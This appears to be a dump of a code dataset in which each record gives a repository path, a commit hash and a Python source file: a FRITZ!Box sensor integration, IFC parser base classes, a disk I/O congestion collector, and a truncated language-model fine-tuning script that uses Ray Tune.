"""AVM FRITZ!Box binary sensors.""" from __future__ import annotations from collections.abc import Callable from dataclasses import dataclass from datetime import datetime, timedelta import logging from typing import Any, Literal from fritzconnection.core.exceptions import ( FritzActionError, FritzActionFailedError, FritzConnectionException, FritzInternalError, FritzServiceError, ) from fritzconnection.lib.fritzstatus import FritzStatus from homeassistant.components.sensor import ( STATE_CLASS_MEASUREMENT, STATE_CLASS_TOTAL_INCREASING, SensorEntity, SensorEntityDescription, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ( DATA_GIGABYTES, DATA_RATE_KILOBITS_PER_SECOND, DATA_RATE_KILOBYTES_PER_SECOND, DEVICE_CLASS_TIMESTAMP, ENTITY_CATEGORY_DIAGNOSTIC, SIGNAL_STRENGTH_DECIBELS, ) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.util.dt import utcnow from .common import FritzBoxBaseEntity, FritzBoxTools from .const import DOMAIN, DSL_CONNECTION, UPTIME_DEVIATION _LOGGER = logging.getLogger(__name__) def _uptime_calculation(seconds_uptime: float, last_value: datetime | None) -> datetime: """Calculate uptime with deviation.""" delta_uptime = utcnow() - timedelta(seconds=seconds_uptime) if ( not last_value or abs((delta_uptime - last_value).total_seconds()) > UPTIME_DEVIATION ): return delta_uptime return last_value def _retrieve_device_uptime_state( status: FritzStatus, last_value: datetime ) -> datetime: """Return uptime from device.""" return _uptime_calculation(status.device_uptime, last_value) def _retrieve_connection_uptime_state( status: FritzStatus, last_value: datetime | None ) -> datetime: """Return uptime from connection.""" return _uptime_calculation(status.connection_uptime, last_value) def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str: """Return external ip from device.""" return status.external_ip # type: ignore[no-any-return] def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload transmission rate.""" return round(status.transmission_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download transmission rate.""" return round(status.transmission_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload max transmission rate.""" return round(status.max_bit_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download max transmission rate.""" return round(status.max_bit_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload total data.""" return round(status.bytes_sent / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return] def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float: """Return download total data.""" return round(status.bytes_received / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload link rate.""" return round(status.max_linked_bit_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download link rate.""" 
return round(status.max_linked_bit_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_noise_margin_sent_state( status: FritzStatus, last_value: str ) -> float: """Return upload noise margin.""" return status.noise_margin[0] / 10 # type: ignore[no-any-return] def _retrieve_link_noise_margin_received_state( status: FritzStatus, last_value: str ) -> float: """Return download noise margin.""" return status.noise_margin[1] / 10 # type: ignore[no-any-return] def _retrieve_link_attenuation_sent_state( status: FritzStatus, last_value: str ) -> float: """Return upload line attenuation.""" return status.attenuation[0] / 10 # type: ignore[no-any-return] def _retrieve_link_attenuation_received_state( status: FritzStatus, last_value: str ) -> float: """Return download line attenuation.""" return status.attenuation[1] / 10 # type: ignore[no-any-return] @dataclass class FritzRequireKeysMixin: """Fritz sensor data class.""" value_fn: Callable[[FritzStatus, Any], Any] @dataclass class FritzSensorEntityDescription(SensorEntityDescription, FritzRequireKeysMixin): """Describes Fritz sensor entity.""" connection_type: Literal["dsl"] | None = None SENSOR_TYPES: tuple[FritzSensorEntityDescription, ...] = ( FritzSensorEntityDescription( key="external_ip", name="External IP", icon="mdi:earth", value_fn=_retrieve_external_ip_state, ), FritzSensorEntityDescription( key="device_uptime", name="Device Uptime", device_class=DEVICE_CLASS_TIMESTAMP, entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_device_uptime_state, ), FritzSensorEntityDescription( key="connection_uptime", name="Connection Uptime", device_class=DEVICE_CLASS_TIMESTAMP, entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_connection_uptime_state, ), FritzSensorEntityDescription( key="kb_s_sent", name="Upload Throughput", state_class=STATE_CLASS_MEASUREMENT, native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND, icon="mdi:upload", value_fn=_retrieve_kb_s_sent_state, ), FritzSensorEntityDescription( key="kb_s_received", name="Download Throughput", state_class=STATE_CLASS_MEASUREMENT, native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND, icon="mdi:download", value_fn=_retrieve_kb_s_received_state, ), FritzSensorEntityDescription( key="max_kb_s_sent", name="Max Connection Upload Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:upload", entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_max_kb_s_sent_state, ), FritzSensorEntityDescription( key="max_kb_s_received", name="Max Connection Download Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:download", entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_max_kb_s_received_state, ), FritzSensorEntityDescription( key="gb_sent", name="GB sent", state_class=STATE_CLASS_TOTAL_INCREASING, native_unit_of_measurement=DATA_GIGABYTES, icon="mdi:upload", value_fn=_retrieve_gb_sent_state, ), FritzSensorEntityDescription( key="gb_received", name="GB received", state_class=STATE_CLASS_TOTAL_INCREASING, native_unit_of_measurement=DATA_GIGABYTES, icon="mdi:download", value_fn=_retrieve_gb_received_state, ), FritzSensorEntityDescription( key="link_kb_s_sent", name="Link Upload Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:upload", value_fn=_retrieve_link_kb_s_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_kb_s_received", name="Link Download Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, 
icon="mdi:download", value_fn=_retrieve_link_kb_s_received_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_noise_margin_sent", name="Link Upload Noise Margin", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:upload", value_fn=_retrieve_link_noise_margin_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_noise_margin_received", name="Link Download Noise Margin", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:download", value_fn=_retrieve_link_noise_margin_received_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_attenuation_sent", name="Link Upload Power Attenuation", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:upload", value_fn=_retrieve_link_attenuation_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_attenuation_received", name="Link Download Power Attenuation", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:download", value_fn=_retrieve_link_attenuation_received_state, connection_type=DSL_CONNECTION, ), ) async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up entry.""" _LOGGER.debug("Setting up FRITZ!Box sensors") fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id] if ( not fritzbox_tools.connection or "WANIPConn1" not in fritzbox_tools.connection.services ): # Only routers are supported at the moment return dsl: bool = False try: dslinterface = await hass.async_add_executor_job( fritzbox_tools.connection.call_action, "WANDSLInterfaceConfig:1", "GetInfo", ) dsl = dslinterface["NewEnable"] except ( FritzInternalError, FritzActionError, FritzActionFailedError, FritzServiceError, ): pass entities = [ FritzBoxSensor(fritzbox_tools, entry.title, description) for description in SENSOR_TYPES if dsl or description.connection_type != DSL_CONNECTION ] async_add_entities(entities, True) class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity): """Define FRITZ!Box connectivity class.""" entity_description: FritzSensorEntityDescription def __init__( self, fritzbox_tools: FritzBoxTools, device_friendly_name: str, description: FritzSensorEntityDescription, ) -> None: """Init FRITZ!Box connectivity class.""" self.entity_description = description self._last_device_value: str | None = None self._attr_available = True self._attr_name = f"{device_friendly_name} {description.name}" self._attr_unique_id = f"{fritzbox_tools.unique_id}-{description.key}" super().__init__(fritzbox_tools, device_friendly_name) def update(self) -> None: """Update data.""" _LOGGER.debug("Updating FRITZ!Box sensors") try: status: FritzStatus = self._fritzbox_tools.fritz_status self._attr_available = True except FritzConnectionException: _LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True) self._attr_available = False return self._attr_native_value = ( self._last_device_value ) = self.entity_description.value_fn(status, self._last_device_value)
[((41, 10, 41, 37), 'logging.getLogger', 'logging.getLogger', ({(41, 28, 41, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((46, 19, 46, 27), 'homeassistant.util.dt.utcnow', 'utcnow', ({}, {}), '()', False, 'from homeassistant.util.dt import utcnow\n'), ((46, 30, 46, 63), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n')]
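Editorial note (not part of the recorded snapshot above): every sensor in this entry is driven by a FritzSensorEntityDescription whose value_fn maps a FritzStatus plus the previous value to the new state. A minimal sketch of one more description in the same pattern, assuming it sits alongside the definitions above; the key, name and icon are invented.

# Illustrative sketch only; reuses FritzSensorEntityDescription from the module above.
from homeassistant.components.sensor import STATE_CLASS_TOTAL_INCREASING
from homeassistant.const import DATA_GIGABYTES

def _retrieve_gb_total_state(status, last_value):
    """Return the total transferred volume (sent + received) in GB."""
    return round((status.bytes_sent + status.bytes_received) / 1e9, 1)

GB_TOTAL_SENSOR = FritzSensorEntityDescription(
    key="gb_total",
    name="GB total",
    state_class=STATE_CLASS_TOTAL_INCREASING,
    native_unit_of_measurement=DATA_GIGABYTES,
    icon="mdi:swap-vertical",
    value_fn=_retrieve_gb_total_state,
)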
gsimon75/IFC_parser
Ifc/IfcBase.py
f9fbe2afa48795bbb502530bc9ab5c4db842e10f
from Ifc.ClassRegistry import ifc_class, ifc_abstract_class, ifc_fallback_class @ifc_abstract_class class IfcEntity: """ Generic IFC entity, only for subclassing from it """ def __init__(self, rtype, args): """ rtype: Resource type args: Arguments in *reverse* order, so you can just args.pop() from it """ self.rtype = rtype def __str__(self): return self.rtype def __json__(self): return {'rtype': self.rtype} @ifc_fallback_class class IfcGenericEntity(IfcEntity): """ Generic IFC entity: type and args """ def __init__(self, rtype, args): IfcEntity.__init__(self, rtype, args) self.args = args self.args.reverse() def __str__(self): return "Gen<{sup}>{a}".format( sup=IfcEntity.__str__(self), a=self.args) @ifc_class class IfcScalarValue(IfcEntity): def __init__(self, rtype, args): IfcEntity.__init__(self, rtype, args) self.value = args.pop() def __str__(self): return str(self.value) @ifc_class class BOOLEAN(IfcScalarValue): pass @ifc_class class REAL(IfcScalarValue): pass @ifc_class class BINARY(IfcScalarValue): pass @ifc_class class INTEGER(IfcScalarValue): pass @ifc_class class NUMBER(IfcScalarValue): pass @ifc_class class STRING(IfcScalarValue): pass @ifc_class class LOGICAL(IfcScalarValue): pass class Omitted: """ Marked with '*' it states that some supertype had defined that attribute, but in the subtype it is a derived (calculated) value, so it no longer makes sense to explicitely assign value to it. """ # TODO: Haven't tried if it can be handled 'just as expected' def __init__(self): pass def __str__(self): return "<omitted>" def __json__(self): return None # class-level, enough to reference, no need to create multiple instances (doesn't hurt though) omitted = Omitted() class Reference: """ Refers to another entity by its index """ def __init__(self, index): self.index = index def __str__(self): return "<#{idx}>".format(idx=self.index) def __json__(self): return {'ref': self.index} class EnumValue: """ Item from some set of enumerated values. """ def __init__(self, value): self.value = value def __str__(self): return "<.{val}.>".format(val=self.value) def __json__(self): return self.value @ifc_class class STEPHeader(IfcEntity): def __init__(self): IfcEntity.__init__(self, "STEPHeader", []) self.fields = {} def add(self, e): self.fields[e.rtype] = e def __str__(self): return "STEPHeader({f})".format(f=", ".join(map(lambda f: "{n}: {v}".format(n=f[0], v=str(f[1])), self.fields.iteritems()))) # vim: set sw=4 ts=4 et:
[]
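Editorial note (not part of the recorded snapshot above): a small sketch exercising the plain helper classes defined in this entry, assuming the repository's Ifc package is importable.

# Illustrative sketch only.
from Ifc.IfcBase import Reference, EnumValue, omitted

ref = Reference(42)        # stands for "#42", i.e. a pointer to another entity
unit = EnumValue("MILLI")  # stands for a ".MILLI." enumeration token
print(ref, unit, omitted)               # <#42> <.MILLI.> <omitted>
print(ref.__json__(), unit.__json__())  # {'ref': 42} MILLI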
xe1gyq/stx-utils
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright (c) 2016 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import logging import os from io_monitor.constants import DOMAIN from io_monitor.utils.data_window import DataCollectionWindow LOG = logging.getLogger(DOMAIN) class DeviceDataCollector(object): # Moving average windows MA_WINDOW_SMA = 0 MA_WINDOW_MED = 1 MA_WINDOW_LAR = 2 # Device status STATUS_NORMAL = "N" STATUS_BUILDING = "B" STATUS_CONGESTED = "L" # Data tracked DATA_IOPS = "iops" DATA_AWAIT = "await" def __init__(self, device_node, data_elements, size_sma, size_med, size_lar): self.node = device_node if os.path.exists('/sys/block/' + self.node + '/dm/name'): self.name = open('/sys/block/' + self.node + '/dm/name', 'r').read().rstrip() else: self.name = self.node self.data_dict = {} self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1} self.timestamp = None self.congestion_status = self.STATUS_NORMAL self.congestion_await_minimal_spike = -1 self.congestion_await_sustained = -1 for element in data_elements: self.data_dict.update({element: [ DataCollectionWindow(size_sma, stuck_data_override=True), DataCollectionWindow(size_med, stuck_data_override=True), DataCollectionWindow(size_lar, stuck_data_override=True)]}) def update_congestion_status(self): # Bail if threshold is not set if self.congestion_await_sustained == -1: return ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) # Set the congestion status based on await moving average if self.congestion_status is self.STATUS_NORMAL: if ma_sma > self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING if self.congestion_status is self.STATUS_BUILDING: if ma_lar > self.congestion_await_sustained: self.congestion_status = self.STATUS_CONGESTED LOG.warn("Node %s (%s) is experiencing high await times." 
% (self.node, self.name)) elif ma_sma < self.congestion_await_sustained: self.congestion_status = self.STATUS_NORMAL if self.congestion_status is self.STATUS_CONGESTED: if ma_med < self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING def update_data(self, ts, element, value): self.timestamp = ts # LOG.debug("%s: e = %s, v= %f" % (self.node, element, value)) for w in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: self.data_dict[element][w].update(value, self.data_caps[element]) def get_latest(self, element): if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][self.MA_WINDOW_SMA].get_latest() def get_average(self, element, window): if window not in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: LOG.error("WindowError: invalid window requested = %s" % window) return 0 if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][window].get_average() def is_data_stale(self, ts): return not (ts == self.timestamp) def get_congestion_status(self, debug=False): if debug: ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" % (self.node, ma_sma, ma_med, ma_lar, self.congestion_await_sustained)) return self.congestion_status def set_data_caps(self, element, cap): if element in self.data_caps: self.data_caps[element] = cap def set_congestion_thresholds(self, await_minimal_spike, await_sustained_congestion): self.congestion_await_minimal_spike = await_minimal_spike self.congestion_await_sustained = await_sustained_congestion def get_element_windows_avg_list(self, element): return [self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR)] def get_element_windows_avg_string(self, element): return "%s [ %9.2f, %9.2f, %9.2f ]" % ( element, self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR))
[((14, 6, 14, 31), 'logging.getLogger', 'logging.getLogger', ({(14, 24, 14, 30): 'DOMAIN'}, {}), '(DOMAIN)', False, 'import logging\n'), ((37, 11, 37, 65), 'os.path.exists', 'os.path.exists', ({(37, 26, 37, 64): "('/sys/block/' + self.node + '/dm/name')"}, {}), "('/sys/block/' + self.node + '/dm/name')", False, 'import os\n'), ((53, 16, 53, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((54, 16, 54, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((55, 16, 55, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')]
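Editorial note (not part of the recorded snapshot above): a minimal sketch of feeding samples into the DeviceDataCollector recorded in this entry, assuming the io_monitor package is importable; window sizes, thresholds and sample values are invented.

# Illustrative sketch only.
from io_monitor.utils.data_collector import DeviceDataCollector

dc = DeviceDataCollector("sda",
                         [DeviceDataCollector.DATA_AWAIT, DeviceDataCollector.DATA_IOPS],
                         size_sma=10, size_med=60, size_lar=300)
dc.set_congestion_thresholds(await_minimal_spike=200, await_sustained_congestion=1000)

# Push a few await samples (ms); the status moves off "N" once the short-window average climbs.
for ts, await_ms in enumerate([5.0, 7.5, 1500.0, 1400.0, 1600.0]):
    dc.update_data(ts, DeviceDataCollector.DATA_AWAIT, await_ms)
    dc.update_congestion_status()
    print(ts, dc.get_congestion_status())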
SoumyaBarikeri/transformers
examples/language-modeling/debias_lm_hps_tune.py
996c6e113404000f50444287aa8a31a174ebd92f
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team. # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, CTRL, BERT, RoBERTa, XLNet). GPT, GPT-2 and CTRL are fine-tuned using a causal language modeling (CLM) loss. BERT and RoBERTa are fine-tuned using a masked language modeling (MLM) loss. XLNet is fine-tuned using a permutation language modeling (PLM) loss. """ import logging import math import os from dataclasses import dataclass, field from typing import Optional import torch from transformers.optimization import AdamW, get_linear_schedule_with_warmup from transformers import ( CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, # LineByLineTextDatasetLabels, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed, ) import ray from ray import tune from transformers.file_utils import is_torch_tpu_available from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from ray.tune.schedulers import PopulationBasedTraining from ray.tune import CLIReporter # if is_wandb_available(): # import wandb ray.shutdown() ray.init(log_to_driver=True, ignore_reinit_error=True) logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": "The model checkpoint for weights initialization. Leave None if you want to train a model from scratch." }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"} ) force_pad_token: bool = field( default=False, metadata={ "help": "Whether to force the addition of a padding token to tokenizer that does not already have one." }, ) debiasing_head: Optional[str] = field( default=None, metadata={"help": "The type of de-biasing head to be used"} ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. 
""" train_data_file: Optional[str] = field( default=None, metadata={"help": "The input training data file (a text file)."} ) eval_data_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) line_by_line: bool = field( default=False, metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."}, ) mlm: bool = field( default=False, metadata={"help": "Train with masked-language modeling loss instead of language modeling."} ) mlm_probability: float = field( default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"} ) plm_probability: float = field( default=1 / 6, metadata={ "help": "Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling." }, ) max_span_length: int = field( default=5, metadata={"help": "Maximum length of a span of masked tokens for permutation language modeling."} ) block_size: int = field( default=-1, metadata={ "help": "Optional input sequence length after tokenization." "The training dataset will be truncated in block of this size for training." "Default to the model max input length for single sentence inputs (take into account special tokens)." }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) def get_dataset( args: DataTrainingArguments, tokenizer: PreTrainedTokenizer, evaluate: bool = False, cache_dir: Optional[str] = None, ): file_path = args.eval_data_file if evaluate else args.train_data_file if args.line_by_line: return LineByLineTextDataset(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size) # return LineByLineTextDatasetLabels(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size) else: return TextDataset( tokenizer=tokenizer, file_path=file_path, block_size=args.block_size, overwrite_cache=args.overwrite_cache, cache_dir=cache_dir, ) class TuneTransformerTrainer(Trainer): def create_optimizer_and_scheduler(self, num_training_steps: int): if self.optimizer is None: no_decay = ["bias", "LayerNorm.weight"] optimizer_grouped_parameters = [ { "params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)], "weight_decay": self.args.weight_decay, }, { "params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0, }, ] self.optimizer = AdamW( optimizer_grouped_parameters, lr=self.args.learning_rate, betas=(self.args.adam_beta1, self.args.adam_beta2), eps=self.args.adam_epsilon, ) if self.lr_scheduler is None: self.lr_scheduler = get_linear_schedule_with_warmup( self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps ) return self.current_optimizer, self.current_scheduler def evaluate(self, eval_dataset= None): eval_dataloader = self.get_eval_dataloader(eval_dataset) output = self.prediction_loop( eval_dataloader, description="Evaluation") self.log(output.metrics) self.save_state() tune.report(**output.metrics) return output.metrics def save_state(self): with tune.checkpoint_dir(step=self.global_step) as checkpoint_dir: self.args.output_dir = checkpoint_dir # This is the directory name that Huggingface requires. 
output_dir = os.path.join( self.args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{self.global_step}") self.save_model(output_dir) self.current_optimizer, self.current_scheduler = self.create_optimizer_and_scheduler(360) if self.is_world_master(): torch.save(self.current_optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) torch.save(self.current_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) def recover_checkpoint(tune_checkpoint_dir, model_name=None): if tune_checkpoint_dir is None or len(tune_checkpoint_dir) == 0: return model_name # Get subdirectory used for Huggingface. subdirs = [ os.path.join(tune_checkpoint_dir, name) for name in os.listdir(tune_checkpoint_dir) if os.path.isdir(os.path.join(tune_checkpoint_dir, name)) ] # There should only be 1 subdir. assert len(subdirs) == 1, subdirs return subdirs[0] # def train_transformer(config, checkpoint_dir=None): # train_dataset, eval_dataset = get_datasets(config) # # training_args = TrainingArguments( # output_dir=tune.get_trial_dir(), # learning_rate=config["learning_rate"], # do_train=True, # do_eval=True, # evaluate_during_training=True, # # Run eval after every epoch. # eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + # 1, # # We explicitly set save to 0, and do checkpointing in evaluate instead # save_steps=0, # num_train_epochs=config["num_epochs"], # max_steps=config["max_steps"], # per_device_train_batch_size=config["per_gpu_train_batch_size"], # per_device_eval_batch_size=config["per_gpu_val_batch_size"], # warmup_steps=0, # weight_decay=config["weight_decay"], # logging_dir="./logs", # ) # # model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"]) # # num_labels = glue_tasks_num_labels[config["task_name"]] # # config = AutoConfig.from_pretrained( # model_name_or_path, # num_labels=num_labels, # finetuning_task=task_name, # ) # model = AutoModelForSequenceClassification.from_pretrained( # model_name_or_path, # config=config, # ) # # # Use our modified TuneTransformerTrainer # tune_trainer = TuneTransformerTrainer( # model=model, # args=training_args, # train_dataset=train_dataset, # eval_dataset=eval_dataset, # compute_metrics=utils.build_compute_metrics_fn(task_name), # ) # tune_trainer.train(model_name_or_path) def train_transformer(config, checkpoint_dir=None): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. # parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # model_args, data_args, training_args = parser.parse_args_into_dataclasses() if data_args.eval_data_file is None and training_args.do_eval: raise ValueError( "Cannot do evaluation without an evaluation data file. Either supply a file to --eval_data_file " "or remove the --do_eval argument." ) if ( os.path.exists(training_args.output_dir) and os.listdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir ): raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome." 
) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN, ) logger.warning( "Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s", training_args.local_rank, training_args.device, training_args.n_gpu, bool(training_args.local_rank != -1), training_args.fp16, ) logger.info("Training/evaluation parameters %s", training_args) # Set seed set_seed(training_args.seed) # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. if model_args.config_name: config_in = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir) elif model_args.model_name_or_path: config_in = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir) else: config_in = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported, but you can do it from another script, save it," "and load it from here, using --tokenizer_name" ) if tokenizer.pad_token_id is None: if model_args.force_pad_token: # See PR 3388. Some tokenizers don't had pad tokens which causes errors at the encoding step in the collate_fn. # We give here the option to force the addition of a pad token. The attention mask is used to ignore this token # when feeding to the model.x tokenizer.add_special_tokens({"pad_token": "<pad>"}) else: logger.warning( "Attempting to train a model whose tokenizer has no padding token. This may result in errors in the encoding step. Set the --force_pad_token flag to fix this." ) model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"]) if model_args.model_name_or_path: model = AutoModelWithLMHead.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config_in, cache_dir=model_args.cache_dir, ) else: logger.info("Training new model from scratch") model = AutoModelWithLMHead.from_config(config_in) special_tokens_dict = {'bos_token': '<bos>', 'eos_token': '<eos>', 'pad_token': '<pad>'} num_added_toks = tokenizer.add_special_tokens(special_tokens_dict) model.resize_token_embeddings(len(tokenizer)) if config_in.model_type in ["bert", "roberta", "distilbert", "camembert"] and not data_args.mlm: raise ValueError( "BERT and RoBERTa-like models do not have LM heads but masked LM heads. They must be run using the" "--mlm flag (masked language modeling)." 
